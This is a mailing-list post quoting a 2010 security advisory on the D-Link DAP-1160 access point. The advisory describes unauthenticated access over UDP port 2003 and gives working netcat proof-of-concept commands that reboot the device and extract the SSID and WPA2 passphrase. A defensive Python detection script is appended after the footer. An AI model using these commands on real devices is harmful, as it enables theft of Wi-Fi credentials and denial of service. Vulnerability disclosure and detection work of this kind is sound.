Is that UDP 2003 open on the WAN interface as well?

Gary Baribault
On 06/28/2010 09:50 AM, Cristofaro Mune wrote:
> Security Advisory
>
> IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration
>
>
> Advisory Information
> --------------------
> Published: 2010-06-28
> Updated: 2010-06-28
>
> Manufacturer: D-Link
> Model: DAP-1160
> Firmware version:
> 1.20b06
> 1.30b10
> 1.31b01
>
>
> Vulnerability Details
> ---------------------
>
> Public References:
> Not Assigned
>
> Platform:
> Successfully tested on D-Link DAP-1160 loaded with firmware versions:
> v120b06, v130b10, v131b01.
> Other models and/or firmware versions may also be affected.
> Note: Only firmware version major numbers are displayed on the
> administration web interface: 1.20, 1.30, 1.31
>
> Background Information:
> D-Link DAP-1160 is a wireless access point that allows wireless clients
> connectivity to wired networks.
> Supports the 802.11b and 802.11g protocols. WEP, WPA and WPA2 are supported.
>
> Summary:
> Unauthenticated access to and modification of several device parameters,
> including Wi-Fi SSID, keys and passphrases, is possible.
> Unauthenticated remote reboot of the device can also be performed.
>
> Details:
> DCCD is a UDP daemon that listens on port UDP 2003 of the device and
> is likely used for easy device configuration via the DCC (D-Link Click
> 'n Connect) protocol.
> By sending properly formatted UDP datagrams to the dccd daemon it is
> possible to perform security-relevant operations without any previous
> authentication.
> It is possible to remotely retrieve sensitive wireless configuration
> parameters, such as Wi-Fi SSID, encryption types, keys and passphrases,
> along with other additional information.
> It is also possible to remotely modify such parameters and configure the
> device without any knowledge of the web administration password.
> Remote reboot is another operation that an attacker may perform in an
> unauthenticated way, possibly triggering a Denial-of-Service condition.
>
> POC:
> - Remote reboot
> python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003
>
> - Retrieving Wi-Fi SSID
> python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003
> cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the
> received datagram)
>
> - Retrieving WPA2 PSK
> python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003
> cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the
> received datagram)
>
> Impacts:
> Remote extraction of sensitive information
> Modification of existing device configuration
> Possible Denial-of-Service
>
> Solutions & Workaround:
> Not available
>
>
> Additional Information
> ----------------------
> Timeline (dd/mm/yyyy):
> 17/02/2010: Vulnerability discovered
> 17/02/2010: No suitable technical/security contact on Global/Regional
> website. No contact available on OSVDB website
> 18/02/2010: Point of contact requested to customer service
> ----------- No response -----------
> 26/05/2010: Partial disclosure at CONFidence 2010
> 28/06/2010: This advisory
>
> Additional information available at http://www.icysilence.org
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
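The datagram layouts quoted in the PoC above are enough to write a detection rule for traffic aimed at dccd. The Python below is an added example, not part of the advisory or any D-Link code: it classifies captured UDP/2003 datagrams by opcode and by the sensitive parameter tags the PoC names, labels the sender as LAN or WAN (an assumed 192.168.0.0/24 LAN prefix, relevant to the question about WAN exposure), and parses reply values on the assumption that the two unnamed bytes after a tag are a little-endian length.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional

DCC_PORT = 2003     # dccd listens here (per the advisory)
HEADER_LEN = 8      # opcode byte followed by 7 zero bytes in the PoC datagrams
OPCODES = {0x03: "get-config", 0x05: "reboot"}   # opcodes used in the PoC
SENSITIVE_TAGS = {  # parameter tags named in the PoC
    b"\x21\x27": "ssid",
    b"\x23\x27": "tag-2327",  # requested alongside the PSK; not named in the advisory
    b"\x24\x27": "wpa2-psk",
}
LAN = ipaddress.ip_network("192.168.0.0/24")  # assumed LAN prefix (not from the advisory)

@dataclass
class Datagram:
    src: str
    dport: int
    payload: bytes

def sensitive_tags(payload: bytes) -> List[str]:
    """Names of sensitive DCC tags appearing after the 8-byte header."""
    return [n for tag, n in SENSITIVE_TAGS.items() if tag in payload[HEADER_LEN:]]

def classify(dg: Datagram) -> Optional[str]:
    """Alert text for a datagram to dccd matching the advisory's patterns, else None."""
    if dg.dport != DCC_PORT or not dg.payload:
        return None
    side = "LAN" if ipaddress.ip_address(dg.src) in LAN else "WAN"  # WAN exposure is worst
    op = OPCODES.get(dg.payload[0])
    if op == "reboot":
        return f"{side} {dg.src}: unauthenticated DCC reboot"
    if op == "get-config":
        tags = sensitive_tags(dg.payload)
        return f"{side} {dg.src}: DCC config query" + (f" for {', '.join(tags)}" if tags else "")
    return None

def extract_values(response: bytes) -> Dict[str, bytes]:
    """Cleartext values from a dccd reply, for leak detection.
    The advisory shows the value after 'tag xx xx'; the two unnamed bytes are
    taken here as a little-endian length (assumption, not from the advisory)."""
    out: Dict[str, bytes] = {}
    for tag, name in SENSITIVE_TAGS.items():
        i = response.find(tag)
        if i >= 0 and i + 4 <= len(response):
            n = int.from_bytes(response[i + 2:i + 4], "little")
            out[name] = response[i + 4:i + 4 + n]
    return out
```

Feed it datagrams from a capture; the PoC reboot packet from an off-LAN source such as 203.0.113.9 classifies as "WAN 203.0.113.9: unauthenticated DCC reboot".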
